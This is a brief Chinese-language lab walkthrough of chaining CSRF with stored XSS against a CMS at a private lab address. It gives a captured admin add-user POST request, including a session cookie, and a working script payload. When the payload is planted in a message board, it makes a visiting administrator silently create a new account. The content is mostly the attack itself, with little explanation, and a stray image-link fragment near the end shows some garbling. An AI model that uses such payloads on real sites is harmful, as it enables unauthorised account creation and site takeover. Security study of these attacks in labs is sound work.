CSRF 与 XSS 相结合
新建用户
抓包
POST /cms/admin/user.action.php HTTP/1.1
Host: 10.1.1.5
Content-Length: 99
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.1.1.5
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.1.1.5/cms/admin/user.add.php?act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: username=admin; userid=1; PHPSESSID=c6tiatmfnr362cku5jf4rpa6e1
Connection: close
act=add&username=zx&password=123&password2=123&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0
构建恶意代码
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.1.1.5/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=wwq&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
xss 注入
管理员访问留言板自动创建用户
-RYj6D6Ol-1700034966477)]
管理员访问留言板自动创建用户